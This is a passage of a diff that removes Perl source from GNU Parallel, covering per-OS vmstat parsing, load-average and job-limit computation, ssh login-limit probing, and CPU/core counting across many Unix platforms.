-		#   346306   829050    74871   606027        0   240231    90367  544858K 62343596  270837K    14178   415070      570102    939846      356      370      116      922  4019813        4        0        0
-		#   345740   830383    74875   606031        0   239234    90369     2696      359      553        0        0      570110    941179      356      370        0        0        0        0        0        0
-		'darwin' => ['vm_stat -c 2 1 | tail -n1', '$21*$22'],
-
-		# ultrix: $12*$13
-		# $ vmstat -S 1 2
-		#  procs      faults    cpu      memory              page             disk
-		#  r b w   in  sy  cs us sy id  avm  fre  si so  pi  po  fr  de  sr s0
-		#  1 0 0    4  23   2  3  0 97 7743 217k   0  0   0   0   0   0   0  0
-		#  1 0 0    6  40   8  0  1 99 7743 217k   0  0   3   0   0   0   0  0
-		'ultrix' => ['vmstat -S 1 2 | tail -1', '$12*$13'],
-
-		# aix: $6*$7
-		# $ vmstat 1 2
-		# System configuration: lcpu=1 mem=2048MB
-		#
-		# kthr    memory              page              faults        cpu
-		# ----- ----------- ------------------------ ------------ -----------
-		#  r  b   avm   fre  re  pi  po  fr   sr  cy  in   sy  cs us sy id wa
-		#  0  0 333933 241803   0   0   0   0    0   0  10  143  90  0  0 99  0
-		#  0  0 334125 241569   0   0   0   0    0   0  37 5368 184  0  9 86  5
-		'aix' => ['vmstat 1 2 | tail -n1', '$6*$7'],
-
-		# freebsd: $8*$9
-		# $ vmstat -H 1 2
-		#  procs      memory      page                    disks     faults         cpu
-		#  r b w     avm    fre   flt  re  pi  po    fr  sr ad0 ad1   in   sy   cs us sy id
-		#  1 0 0  596716   19560    32   0   0   0    33   8   0   0   11  220  277  0  0 99
-		#  0 0 0  596716   19560     2   0   0   0     0   0   0   0   11  144  263  0  1 99
-		'freebsd' => ['vmstat -H 1 2 | tail -n1', '$8*$9'],
-
-		# mirbsd: $8*$9
-		# $ vmstat 1 2
-		#  procs   memory        page                    disks     traps         cpu
-		#  r b w    avm    fre   flt  re  pi  po  fr  sr wd0 cd0  int   sys   cs us sy id
-		#  0 0 0  25776 164968    34   0   0   0   0   0   0   0  230   259   38  4  0 96
-		#  0 0 0  25776 164968    24   0   0   0   0   0   0   0  237   275   37  0  0 100
-		'mirbsd' => ['vmstat 1 2 | tail -n1', '$8*$9'],
-
-		# netbsd: $7*$8
-		# $ vmstat 1 2
-		#  procs    memory      page                       disks   faults      cpu
-		#  r b      avm    fre  flt  re  pi   po   fr   sr w0 w1   in   sy  cs us sy id
-		#  0 0   138452   6012   54   0   0    0    1    2  3  0    4  100  23  0  0 100
-		#  0 0   138456   6008    1   0   0    0    0    0  0  0    7   26  19  0 0 100
-		'netbsd' => ['vmstat 1 2 | tail -n1', '$7*$8'],
-
-		# openbsd: $8*$9
-		# $ vmstat 1 2
-		#  procs    memory       page                    disks    traps          cpu
-		#  r b w    avm     fre  flt  re  pi  po  fr  sr wd0 wd1  int   sys   cs us sy id
-		#  0 0 0  76596  109944   73   0   0   0   0   0   0   1    5   259   22  0  1 99
-		#  0 0 0  76604  109936   24   0   0   0   0   0   0   0    7   114   20  0  1 99
-		'openbsd' => ['vmstat 1 2 | tail -n1', '$8*$9'],
-
-		# hpux: $8*$9
-		# $ vmstat 1 2
-		#          procs           memory                   page                              faults       cpu
-		#     r     b     w      avm    free   re   at    pi   po    fr   de    sr     in     sy    cs  us sy id
-		#     1     0     0   247211  216476    4    1     0    0     0    0     0    102  73005    54   6 11 83
-		#     1     0     0   247211  216421   43    9     0    0     0    0     0    144   1675    96  25269512791222387000 25269512791222387000 105
-		'hpux' => ['vmstat 1 2 | tail -n1', '$8*$9'],
-
-		# dec_osf (tru64): $11*$12
-		# $ vmstat  1 2
-		# Virtual Memory Statistics: (pagesize = 8192)
-		#   procs      memory        pages                            intr       cpu
-		#   r   w   u  act free wire fault  cow zero react  pin pout  in  sy  cs us sy id
-		#   3 181  36  51K 1895 8696  348M  59M 122M   259  79M    0   5 218 302  4  1 94
-		#   3 181  36  51K 1893 8696     3   15   21     0   28    0   4  81 321  1  1 98
-		'dec_osf' => ['vmstat 1 2 | tail -n1', '$11*$12'],
-
-		# gnu (hurd): $7*$8
-		# $ vmstat -k 1 2
-		# (pagesize: 4, size: 512288, swap size: 894972)
-		#   free   actv  inact  wired   zeroed  react    pgins   pgouts  pfaults  cowpfs hrat    caobj  cache swfree
-		# 371940  30844  89228  20276   298348      0    48192    19016   756105   99808  98%      876  20628 894972
-		# 371940  30844  89228  20276       +0     +0       +0       +0      +42      +2  98%      876  20628 894972
-		'gnu' => ['vmstat -k 1 2 | tail -n1', '$7*$8'],
-
-		# -nto (qnx has no swap)
-		#-irix
-		#-svr5 (scosysv)
-		);
-	    my $perlscript = "";
-	    for my $os (keys %vmstat) {
-		#q[ { vmstat 1 2 2> /dev/null || vmstat -c 1 2; } | ].
-		#   q[ awk 'NR!=4{next} NF==17||NF==16{print $7*$8} NF==22{print $21*$22} {exit}' ];
-		$vmstat{$os}[1] =~ s/\$/\\\\\\\$/g; # $ => \\\$
-		$perlscript .= 'if($^O eq "'.$os.'") { print `'.$vmstat{$os}[0].' | awk "{print ' .
-		    $vmstat{$os}[1] . '}"` }';
-	    }
-	    $perlscript = "perl -e " . ::shell_quote_scalar($perlscript);
-	    $script = $Global::envvar. " " .$perlscript;
-	}
-	return $script;
-    }
-}
-
-sub too_fast_remote_login {
-    my $self = shift;
-    if($self->{'last_login_at'} and $self->{'time_to_login'}) {
-	# sshd normally allows 10 simultaneous logins
-	# A login takes time_to_login
-	# So time_to_login/5 should be safe
-	# If now <= last_login + time_to_login/5: Then it is too soon.
-	my $too_fast = (::now() <= $self->{'last_login_at'}
-			+ $self->{'time_to_login'}/5);
-	::debug("run", "Too fast? $too_fast ");
-	return $too_fast;
-    } else {
-	# No logins so far (or time_to_login not computed): it is not too fast
-	return 0;
-    }
-}
-
-sub last_login_at {
-    my $self = shift;
-    return $self->{'last_login_at'};
-}
-
-sub set_last_login_at {
-    my $self = shift;
-    $self->{'last_login_at'} = shift;
-}
-
-sub loadavg_too_high {
-    my $self = shift;
-    my $loadavg = $self->loadavg();
-    return (not defined $loadavg or
-            $loadavg > $self->max_loadavg());
-}
-
-sub loadavg {
-    # If the currently know loadavg is too old:
-    #   Recompute a new one in the background
-    # The load average is computed as the number of processes waiting for disk
-    # or CPU right now. So it is the server load this instant and not averaged over
-    # several minutes. This is needed so GNU Parallel will at most start one job
-    # that will push the load over the limit.
-    #
-    # Returns:
-    #   $last_loadavg = last load average computed (undef if none)
-    my $self = shift;
-    # Should we update the loadavg file?
-    my $update_loadavg_file = 0;
-    if(open(my $load_fh, "<", $self->{'loadavg_file'})) {
-	local $/ = undef;
-        my $load_out = <$load_fh>;
-        close $load_fh;
-	my $load =()= ($load_out=~/(^[DR]....[^\[])/gm);
-        if($load > 0) {
-	    # load is overestimated by 1
-            $self->{'loadavg'} = $load - 1;
-            ::debug("load", "New loadavg: ", $self->{'loadavg'});
-        } else {
-	    ::die_bug("loadavg_invalid_content: $load_out");
-	}
-        ::debug("load", "Last update: ", $self->{'last_loadavg_update'});
-        if(time - $self->{'last_loadavg_update'} > 10) {
-            # last loadavg was started 10 seconds ago
-            ::debug("load", time - $self->{'last_loadavg_update'}, " secs old: ",
-		    $self->{'loadavg_file'});
-            $update_loadavg_file = 1;
-        }
-    } else {
-        ::debug("load", "No loadavg file: ", $self->{'loadavg_file'});
-        $self->{'loadavg'} = undef;
-        $update_loadavg_file = 1;
-    }
-    if($update_loadavg_file) {
-        ::debug("load", "Updating loadavg file", $self->{'loadavg_file'}, "\n");
-        $self->{'last_loadavg_update'} = time;
-        -e $ENV{'HOME'}."/.parallel" or mkdir $ENV{'HOME'}."/.parallel";
-        -e $ENV{'HOME'}."/.parallel/tmp" or mkdir $ENV{'HOME'}."/.parallel/tmp";
-        my $cmd = "";
-        if($self->{'string'} ne ":") {
-	    $cmd = $self->sshcommand() . " " . $self->serverlogin() . " ";
-	}
-	# TODO Is is called 'ps ax -o state,command' on other platforms?
-	$cmd .= "ps ax -o state,command";
-        # As the command can take long to run if run remote
-        # save it to a tmp file before moving it to the correct file
-        my $file = $self->{'loadavg_file'};
-        my ($dummy_fh, $tmpfile) = ::tmpfile(SUFFIX => ".loa");
-        qx{ ($cmd > $tmpfile && mv $tmpfile $file || rm $tmpfile) & };
-    }
-    return $self->{'loadavg'};
-}
-
-sub max_loadavg {
-    my $self = shift;
-    # If --load is a file it might be changed
-    if($Global::max_load_file) {
-	my $mtime = (stat($Global::max_load_file))[9];
-	if($mtime > $Global::max_load_file_last_mod) {
-	    $Global::max_load_file_last_mod = $mtime;
-	    for my $sshlogin (values %Global::host) {
-		$sshlogin->set_max_loadavg(undef);
-	    }
-	}
-    }
-    if(not defined $self->{'max_loadavg'}) {
-        $self->{'max_loadavg'} =
-            $self->compute_max_loadavg($opt::load);
-    }
-    ::debug("load", "max_loadavg: ", $self->string(), " ", $self->{'max_loadavg'});
-    return $self->{'max_loadavg'};
-}
-
-sub set_max_loadavg {
-    my $self = shift;
-    $self->{'max_loadavg'} = shift;
-}
-
-sub compute_max_loadavg {
-    # Parse the max loadaverage that the user asked for using --load
-    # Returns:
-    #   max loadaverage
-    my $self = shift;
-    my $loadspec = shift;
-    my $load;
-    if(defined $loadspec) {
-        if($loadspec =~ /^\+(\d+)$/) {
-            # E.g. --load +2
-            my $j = $1;
-            $load =
-                $self->ncpus() + $j;
-        } elsif ($loadspec =~ /^-(\d+)$/) {
-            # E.g. --load -2
-            my $j = $1;
-            $load =
-                $self->ncpus() - $j;
-        } elsif ($loadspec =~ /^(\d+)\%$/) {
-            my $j = $1;
-            $load =
-                $self->ncpus() * $j / 100;
-        } elsif ($loadspec =~ /^(\d+(\.\d+)?)$/) {
-            $load = $1;
-        } elsif (-f $loadspec) {
-            $Global::max_load_file = $loadspec;
-            $Global::max_load_file_last_mod = (stat($Global::max_load_file))[9];
-            if(open(my $in_fh, "<", $Global::max_load_file)) {
-                my $opt_load_file = join("",<$in_fh>);
-                close $in_fh;
-                $load = $self->compute_max_loadavg($opt_load_file);
-            } else {
-                print $Global::original_stderr "Cannot open $loadspec\n";
-                ::wait_and_exit(255);
-            }
-        } else {
-            print $Global::original_stderr "Parsing of --load failed\n";
-            ::die_usage();
-        }
-        if($load < 0.01) {
-            $load = 0.01;
-        }
-    }
-    return $load;
-}
-
-sub time_to_login {
-    my $self = shift;
-    return $self->{'time_to_login'};
-}
-
-sub set_time_to_login {
-    my $self = shift;
-    $self->{'time_to_login'} = shift;
-}
-
-sub max_jobs_running {
-    my $self = shift;
-    if(not defined $self->{'max_jobs_running'}) {
-        my $nproc = $self->compute_number_of_processes($opt::jobs);
-        $self->set_max_jobs_running($nproc);
-    }
-    return $self->{'max_jobs_running'};
-}
-
-sub orig_max_jobs_running {
-    my $self = shift;
-    return $self->{'orig_max_jobs_running'};
-}
-
-sub compute_number_of_processes {
-    # Number of processes wanted and limited by system resources
-    # Returns:
-    #   Number of processes
-    my $self = shift;
-    my $opt_P = shift;
-    my $wanted_processes = $self->user_requested_processes($opt_P);
-    if(not defined $wanted_processes) {
-        $wanted_processes = $Global::default_simultaneous_sshlogins;
-    }
-    ::debug("load", "Wanted procs: $wanted_processes\n");
-    my $system_limit =
-        $self->processes_available_by_system_limit($wanted_processes);
-    ::debug("load", "Limited to procs: $system_limit\n");
-    return $system_limit;
-}
-
-sub processes_available_by_system_limit {
-    # If the wanted number of processes is bigger than the system limits:
-    # Limit them to the system limits
-    # Limits are: File handles, number of input lines, processes,
-    # and taking > 1 second to spawn 10 extra processes
-    # Returns:
-    #   Number of processes
-    my $self = shift;
-    my $wanted_processes = shift;
-
-    my $system_limit = 0;
-    my @jobs = ();
-    my $job;
-    my @args = ();
-    my $arg;
-    my $more_filehandles = 1;
-    my $max_system_proc_reached = 0;
-    my $slow_spawining_warning_printed = 0;
-    my $time = time;
-    my %fh;
-    my @children;
-
-    # Reserve filehandles
-    # perl uses 7 filehandles for something?
-    # parallel uses 1 for memory_usage
-    # parallel uses 4 for ?
-    for my $i (1..12) {
-        open($fh{"init-$i"}, "<", "/dev/null");
-    }
-
-    for(1..2) {
-        # System process limit
-        my $child;
-        if($child = fork()) {
-            push (@children,$child);
-            $Global::unkilled_children{$child} = 1;
-        } elsif(defined $child) {
-            # The child takes one process slot
-            # It will be killed later
-            $SIG{TERM} = $Global::original_sig{TERM};
-            sleep 10000000;
-            exit(0);
-        } else {
-            $max_system_proc_reached = 1;
-        }
-    }
-    my $count_jobs_already_read = $Global::JobQueue->next_seq();
-    my $wait_time_for_getting_args = 0;
-    my $start_time = time;
-    while(1) {
-        $system_limit >= $wanted_processes and last;
-        not $more_filehandles and last;
-        $max_system_proc_reached and last;
-	my $before_getting_arg = time;
-        if($Global::semaphore or $opt::pipe) {
-	    # Skip: No need to get args
-        } elsif(defined $opt::retries and $count_jobs_already_read) {
-            # For retries we may need to run all jobs on this sshlogin
-            # so include the already read jobs for this sshlogin
-            $count_jobs_already_read--;
-        } else {
-            if($opt::X or $opt::m) {
-                # The arguments may have to be re-spread over several jobslots
-                # So pessimistically only read one arg per jobslot
-                # instead of a full commandline
-                if($Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->empty()) {
-		    if($Global::JobQueue->empty()) {
-			last;
-		    } else {
-			($job) = $Global::JobQueue->get();
-			push(@jobs, $job);
-		    }
-		} else {
-		    ($arg) = $Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->get();
-		    push(@args, $arg);
-		}
-            } else {
-                # If there are no more command lines, then we have a process
-                # per command line, so no need to go further
-                $Global::JobQueue->empty() and last;
-                ($job) = $Global::JobQueue->get();
-                push(@jobs, $job);
-	    }
-        }
-	$wait_time_for_getting_args += time - $before_getting_arg;
-        $system_limit++;
-
-        # Every simultaneous process uses 2 filehandles when grouping
-        # Every simultaneous process uses 2 filehandles when compressing
-        $more_filehandles = open($fh{$system_limit*10}, "<", "/dev/null")
-            && open($fh{$system_limit*10+2}, "<", "/dev/null")
-            && open($fh{$system_limit*10+3}, "<", "/dev/null")
-            && open($fh{$system_limit*10+4}, "<", "/dev/null");
-
-        # System process limit
-        my $child;
-        if($child = fork()) {
-            push (@children,$child);
-            $Global::unkilled_children{$child} = 1;
-        } elsif(defined $child) {
-            # The child takes one process slot
-            # It will be killed later
-            $SIG{TERM} = $Global::original_sig{TERM};
-            sleep 10000000;
-            exit(0);
-        } else {
-            $max_system_proc_reached = 1;
-        }
-	my $forktime = time - $time - $wait_time_for_getting_args;
-        ::debug("run", "Time to fork $system_limit procs: $wait_time_for_getting_args ",
-		$forktime,
-		" (processes so far: ", $system_limit,")\n");
-        if($system_limit > 10 and
-	   $forktime > 1 and
-	   $forktime > $system_limit * 0.01
-	   and not $slow_spawining_warning_printed) {
-            # It took more than 0.01 second to fork a processes on avg.
-            # Give the user a warning. He can press Ctrl-C if this
-            # sucks.
-            print $Global::original_stderr
-                ("parallel: Warning: Starting $system_limit processes took > $forktime sec.\n",
-                 "Consider adjusting -j. Press CTRL-C to stop.\n");
-            $slow_spawining_warning_printed = 1;
-        }
-    }
-    # Cleanup: Close the files
-    for (values %fh) { close $_ }
-    # Cleanup: Kill the children
-    for my $pid (@children) {
-        kill 9, $pid;
-        waitpid($pid,0);
-        delete $Global::unkilled_children{$pid};
-    }
-    # Cleanup: Unget the command_lines or the @args
-    $Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->unget(@args);
-    $Global::JobQueue->unget(@jobs);
-    if($system_limit < $wanted_processes) {
-	# The system_limit is less than the wanted_processes
-	if($system_limit < 1 and not $Global::JobQueue->empty()) {
-	    ::warning("Cannot spawn any jobs. Raising ulimit -u or /etc/security/limits.conf\n",
-		      "or /proc/sys/kernel/pid_max may help.\n");
-	    ::wait_and_exit(255);
-	}
-	if(not $more_filehandles) {
-	    ::warning("Only enough file handles to run ", $system_limit, " jobs in parallel.\n",
-		      "Running 'parallel -j0 -N", $system_limit, " --pipe parallel -j0' or ",
-		      "raising ulimit -n or /etc/security/limits.conf may help.\n");
-	}
-	if($max_system_proc_reached) {
-	    ::warning("Only enough available processes to run ", $system_limit,
-		      " jobs in parallel. Raising ulimit -u or /etc/security/limits.conf\n",
-		      "or /proc/sys/kernel/pid_max may help.\n");
-	}
-    }
-    if($] == 5.008008 and $system_limit > 1000) {
-	# https://savannah.gnu.org/bugs/?36942
-	$system_limit = 1000;
-    }
-    if($Global::JobQueue->empty()) {
-	$system_limit ||= 1;
-    }
-    if($self->string() ne ":" and
-       $system_limit > $Global::default_simultaneous_sshlogins) {
-        $system_limit =
-            $self->simultaneous_sshlogin_limit($system_limit);
-    }
-    return $system_limit;
-}
-
-sub simultaneous_sshlogin_limit {
-    # Test by logging in wanted number of times simultaneously
-    # Returns:
-    #   min($wanted_processes,$working_simultaneous_ssh_logins-1)
-    my $self = shift;
-    my $wanted_processes = shift;
-    if($self->{'time_to_login'}) {
-	return $wanted_processes;
-    }
-
-    # Try twice because it guesses wrong sometimes
-    # Choose the minimal
-    my $ssh_limit =
-        ::min($self->simultaneous_sshlogin($wanted_processes),
-	      $self->simultaneous_sshlogin($wanted_processes));
-    if($ssh_limit < $wanted_processes) {
-        my $serverlogin = $self->serverlogin();
-        ::warning("ssh to $serverlogin only allows ",
-		  "for $ssh_limit simultaneous logins.\n",
-		  "You may raise this by changing ",
-		  "/etc/ssh/sshd_config:MaxStartups and MaxSessions on $serverlogin.\n",
-		  "Using only ",$ssh_limit-1," connections ",
-		  "to avoid race conditions.\n");
-    }
-    # Race condition can cause problem if using all sshs.
-    if($ssh_limit > 1) { $ssh_limit -= 1; }
-    return $ssh_limit;
-}
-
-sub simultaneous_sshlogin {
-    # Using $sshlogin try to see if we can do $wanted_processes
-    # simultaneous logins
-    # (ssh host echo simultaneouslogin & ssh host echo simultaneouslogin & ...)|grep simul|wc -l
-    # Returns:
-    #   Number of succesful logins
-    my $self = shift;
-    my $wanted_processes = shift;
-    my $sshcmd = $self->sshcommand();
-    my $serverlogin = $self->serverlogin();
-    my $sshdelay = $opt::sshdelay ? "sleep $opt::sshdelay;" : "";
-    my $cmd = "$sshdelay$sshcmd $serverlogin echo simultaneouslogin </dev/null 2>&1 &"x$wanted_processes;
-    ::debug("init", "Trying $wanted_processes logins at $serverlogin\n");
-    open (my $simul_fh, "-|", "($cmd)|grep simultaneouslogin | wc -l") or
-	::die_bug("simultaneouslogin");
-    my $ssh_limit = <$simul_fh>;
-    close $simul_fh;
-    chomp $ssh_limit;
-    return $ssh_limit;
-}
-
-sub set_ncpus {
-    my $self = shift;
-    $self->{'ncpus'} = shift;
-}
-
-sub user_requested_processes {
-    # Parse the number of processes that the user asked for using -j
-    # Returns:
-    #   the number of processes to run on this sshlogin
-    my $self = shift;
-    my $opt_P = shift;
-    my $processes;
-    if(defined $opt_P) {
-        if($opt_P =~ /^\+(\d+)$/) {
-            # E.g. -P +2
-            my $j = $1;
-            $processes =
-                $self->ncpus() + $j;
-        } elsif ($opt_P =~ /^-(\d+)$/) {
-            # E.g. -P -2
-            my $j = $1;
-            $processes =
-                $self->ncpus() - $j;
-        } elsif ($opt_P =~ /^(\d+(\.\d+)?)\%$/) {
-            # E.g. -P 10.5%
-            my $j = $1;
-            $processes =
-                $self->ncpus() * $j / 100;
-        } elsif ($opt_P =~ /^(\d+)$/) {
-            $processes = $1;
-            if($processes == 0) {
-                # -P 0 = infinity (or at least close)
-                $processes = $Global::infinity;
-            }
-        } elsif (-f $opt_P) {
-            $Global::max_procs_file = $opt_P;
-            $Global::max_procs_file_last_mod = (stat($Global::max_procs_file))[9];
-            if(open(my $in_fh, "<", $Global::max_procs_file)) {
-                my $opt_P_file = join("",<$in_fh>);
-                close $in_fh;
-                $processes = $self->user_requested_processes($opt_P_file);
-            } else {
-                ::error("Cannot open $opt_P.\n");
-                ::wait_and_exit(255);
-            }
-        } else {
-            ::error("Parsing of --jobs/-j/--max-procs/-P failed.\n");
-            ::die_usage();
-        }
-	$processes = ::ceil($processes);
-    }
-    return $processes;
-}
-
-sub ncpus {
-    my $self = shift;
-    if(not defined $self->{'ncpus'}) {
-        my $sshcmd = $self->sshcommand();
-        my $serverlogin = $self->serverlogin();
-        if($serverlogin eq ":") {
-            if($opt::use_cpus_instead_of_cores) {
-                $self->{'ncpus'} = no_of_cpus();
-            } else {
-                $self->{'ncpus'} = no_of_cores();
-            }
-        } else {
-            my $ncpu;
-	    my $sqe = ::shell_quote_scalar($Global::envvar);
-            if($opt::use_cpus_instead_of_cores) {
-                $ncpu = qx(echo|$sshcmd $serverlogin $sqe parallel --number-of-cpus);
-            } else {
-		::debug("init",qq(echo|$sshcmd $serverlogin $sqe parallel --number-of-cores\n));
-                $ncpu = qx(echo|$sshcmd $serverlogin $sqe parallel --number-of-cores);
-            }
-	    chomp $ncpu;
-            if($ncpu =~ /^\s*[0-9]+\s*$/s) {
-                $self->{'ncpus'} = $ncpu;
-            } else {
-                ::warning("Could not figure out ",
-			  "number of cpus on $serverlogin ($ncpu). Using 1.\n");
-                $self->{'ncpus'} = 1;
-            }
-        }
-    }
-    return $self->{'ncpus'};
-}
-
-sub no_of_cpus {
-    # Returns:
-    #   Number of physical CPUs
-    local $/="\n"; # If delimiter is set, then $/ will be wrong
-    my $no_of_cpus;
-    if ($^O eq 'linux') {
-        $no_of_cpus = no_of_cpus_gnu_linux() || no_of_cores_gnu_linux();
-    } elsif ($^O eq 'freebsd') {
-        $no_of_cpus = no_of_cpus_freebsd();
-    } elsif ($^O eq 'netbsd') {
-        $no_of_cpus = no_of_cpus_netbsd();
-    } elsif ($^O eq 'openbsd') {
-        $no_of_cpus = no_of_cpus_openbsd();
-    } elsif ($^O eq 'gnu') {
-        $no_of_cpus = no_of_cpus_hurd();
-    } elsif ($^O eq 'darwin') {
-	$no_of_cpus = no_of_cpus_darwin();
-    } elsif ($^O eq 'solaris') {
-        $no_of_cpus = no_of_cpus_solaris();
-    } elsif ($^O eq 'aix') {
-        $no_of_cpus = no_of_cpus_aix();
-    } elsif ($^O eq 'hpux') {
-        $no_of_cpus = no_of_cpus_hpux();
-    } elsif ($^O eq 'nto') {
-        $no_of_cpus = no_of_cpus_qnx();
-    } elsif ($^O eq 'svr5') {
-        $no_of_cpus = no_of_cpus_openserver();
-    } elsif ($^O eq 'irix') {
-        $no_of_cpus = no_of_cpus_irix();
-    } elsif ($^O eq 'dec_osf') {
-        $no_of_cpus = no_of_cpus_tru64();
-    } else {
-	$no_of_cpus = (no_of_cpus_gnu_linux()
-		       || no_of_cpus_freebsd()
-		       || no_of_cpus_netbsd()
-		       || no_of_cpus_openbsd()
-		       || no_of_cpus_hurd()
-		       || no_of_cpus_darwin()
-		       || no_of_cpus_solaris()
-		       || no_of_cpus_aix()
-		       || no_of_cpus_hpux()
-		       || no_of_cpus_qnx()
-		       || no_of_cpus_openserver()
-		       || no_of_cpus_irix()
-		       || no_of_cpus_tru64()
-			# Number of cores is better than no guess for #CPUs
-		       || nproc()
-	    );
-    }
-    if($no_of_cpus) {
-	chomp $no_of_cpus;
-        return $no_of_cpus;
-    } else {
-        ::warning("Cannot figure out number of cpus. Using 1.\n");
-        return 1;
-    }
-}
-
-sub no_of_cores {
-    # Returns:
-    #   Number of CPU cores
-    local $/="\n"; # If delimiter is set, then $/ will be wrong
-    my $no_of_cores;
-    if ($^O eq 'linux') {
-	$no_of_cores = no_of_cores_gnu_linux();
-    } elsif ($^O eq 'freebsd') {
-        $no_of_cores = no_of_cores_freebsd();
-    } elsif ($^O eq 'netbsd') {
-        $no_of_cores = no_of_cores_netbsd();
-    } elsif ($^O eq 'openbsd') {
-        $no_of_cores = no_of_cores_openbsd();
-    } elsif ($^O eq 'gnu') {
-        $no_of_cores = no_of_cores_hurd();
-    } elsif ($^O eq 'darwin') {
-	$no_of_cores = no_of_cores_darwin();
-    } elsif ($^O eq 'solaris') {
-	$no_of_cores = no_of_cores_solaris();
-    } elsif ($^O eq 'aix') {
-        $no_of_cores = no_of_cores_aix();
-    } elsif ($^O eq 'hpux') {
-        $no_of_cores = no_of_cores_hpux();
-    } elsif ($^O eq 'nto') {
-        $no_of_cores = no_of_cores_qnx();
-    } elsif ($^O eq 'svr5') {
-        $no_of_cores = no_of_cores_openserver();
-    } elsif ($^O eq 'irix') {
-        $no_of_cores = no_of_cores_irix();
-    } elsif ($^O eq 'dec_osf') {
-        $no_of_cores = no_of_cores_tru64();
-    } else {
-	$no_of_cores = (no_of_cores_gnu_linux()
-			|| no_of_cores_freebsd()
-			|| no_of_cores_netbsd()
-			|| no_of_cores_openbsd()
-			|| no_of_cores_hurd()
-			|| no_of_cores_darwin()
-			|| no_of_cores_solaris()
-			|| no_of_cores_aix()
-			|| no_of_cores_hpux()
-			|| no_of_cores_qnx()
-			|| no_of_cores_openserver()
-			|| no_of_cores_irix()
-			|| no_of_cores_tru64()
-			|| nproc()
-	    );
-    }
-    if($no_of_cores) {
-	chomp $no_of_cores;
-        return $no_of_cores;
-    } else {
-        ::warning("Cannot figure out number of CPU cores. Using 1.\n");
-        return 1;
-    }
-}
-
-sub nproc {
-    # Returns:
-    #   Number of cores using `nproc`
-    my $no_of_cores = `nproc 2>/dev/null`;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_gnu_linux {
-    # Returns:
-    #   Number of physical CPUs on GNU/Linux
-    #   undef if not GNU/Linux
-    my $no_of_cpus;
-    my $no_of_cores;
-    if(-e "/proc/cpuinfo") {
-        $no_of_cpus = 0;
-        $no_of_cores = 0;
-        my %seen;
-        open(my $in_fh, "<", "/proc/cpuinfo") || return undef;
-        while(<$in_fh>) {
-            if(/^physical id.*[:](.*)/ and not $seen{$1}++) {
-                $no_of_cpus++;
-            }
-            /^processor.*[:]/i and $no_of_cores++;
-        }
-        close $in_fh;
-    }
-    return ($no_of_cpus||$no_of_cores);
-}
-
-sub no_of_cores_gnu_linux {
-    # Returns:
-    #   Number of CPU cores on GNU/Linux
-    #   undef if not GNU/Linux
-    my $no_of_cores;
-    if(-e "/proc/cpuinfo") {
-        $no_of_cores = 0;
-        open(my $in_fh, "<", "/proc/cpuinfo") || return undef;
-        while(<$in_fh>) {
-            /^processor.*[:]/i and $no_of_cores++;
-        }
-        close $in_fh;
-    }
-    return $no_of_cores;
-}
-
-sub no_of_cpus_freebsd {
-    # Returns:
-    #   Number of physical CPUs on FreeBSD
-    #   undef if not FreeBSD
-    my $no_of_cpus =
-	(`sysctl -a dev.cpu 2>/dev/null | grep \%parent | awk '{ print \$2 }' | uniq | wc -l | awk '{ print \$1 }'`
-	 or
-	 `sysctl hw.ncpu 2>/dev/null | awk '{ print \$2 }'`);
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_freebsd {
-    # Returns:
-    #   Number of CPU cores on FreeBSD
-    #   undef if not FreeBSD
-    my $no_of_cores =
-	(`sysctl hw.ncpu 2>/dev/null | awk '{ print \$2 }'`
-	 or
-	 `sysctl -a hw  2>/dev/null | grep [^a-z]logicalcpu[^a-z] | awk '{ print \$2 }'`);
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_netbsd {
-    # Returns:
-    #   Number of physical CPUs on NetBSD
-    #   undef if not NetBSD
-    my $no_of_cpus = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_netbsd {
-    # Returns:
-    #   Number of CPU cores on NetBSD
-    #   undef if not NetBSD
-    my $no_of_cores = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_openbsd {
-    # Returns:
-    #   Number of physical CPUs on OpenBSD
-    #   undef if not OpenBSD
-    my $no_of_cpus = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_openbsd {
-    # Returns:
-    #   Number of CPU cores on OpenBSD
-    #   undef if not OpenBSD
-    my $no_of_cores = `sysctl -n hw.ncpu 2>/dev/null`;
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_hurd {
-    # Returns:
-    #   Number of physical CPUs on HURD
-    #   undef if not HURD
-    my $no_of_cpus = `nproc`;
-    chomp $no_of_cpus;
-    return $no_of_cpus;
-}
-
-sub no_of_cores_hurd {
-    # Returns:
-    #   Number of physical CPUs on HURD
-    #   undef if not HURD
-    my $no_of_cores = `nproc`;
-    chomp $no_of_cores;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_darwin {
-    # Returns:
-    #   Number of physical CPUs on Mac Darwin
-    #   undef if not Mac Darwin
-    my $no_of_cpus =
-	(`sysctl -n hw.physicalcpu 2>/dev/null`
-	 or
-	 `sysctl -a hw 2>/dev/null | grep [^a-z]physicalcpu[^a-z] | awk '{ print \$2 }'`);
-    return $no_of_cpus;
-}
-
-sub no_of_cores_darwin {
-    # Returns:
-    #   Number of CPU cores on Mac Darwin
-    #   undef if not Mac Darwin
-    my $no_of_cores =
-	(`sysctl -n hw.logicalcpu 2>/dev/null`
-	 or
-	 `sysctl -a hw  2>/dev/null | grep [^a-z]logicalcpu[^a-z] | awk '{ print \$2 }'`);
-    return $no_of_cores;
-}
-
-sub no_of_cpus_solaris {
-    # Returns:
-    #   Number of physical CPUs on Solaris
-    #   undef if not Solaris
-    if(-x "/usr/sbin/psrinfo") {
-        my @psrinfo = `/usr/sbin/psrinfo`;
-        if($#psrinfo >= 0) {
-            return $#psrinfo +1;
-        }
-    }
-    if(-x "/usr/sbin/prtconf") {
-        my @prtconf = `/usr/sbin/prtconf | grep cpu..instance`;
-        if($#prtconf >= 0) {
-            return $#prtconf +1;
-        }
-    }
-    return undef;
-}
-
-sub no_of_cores_solaris {
-    # Returns:
-    #   Number of CPU cores on Solaris
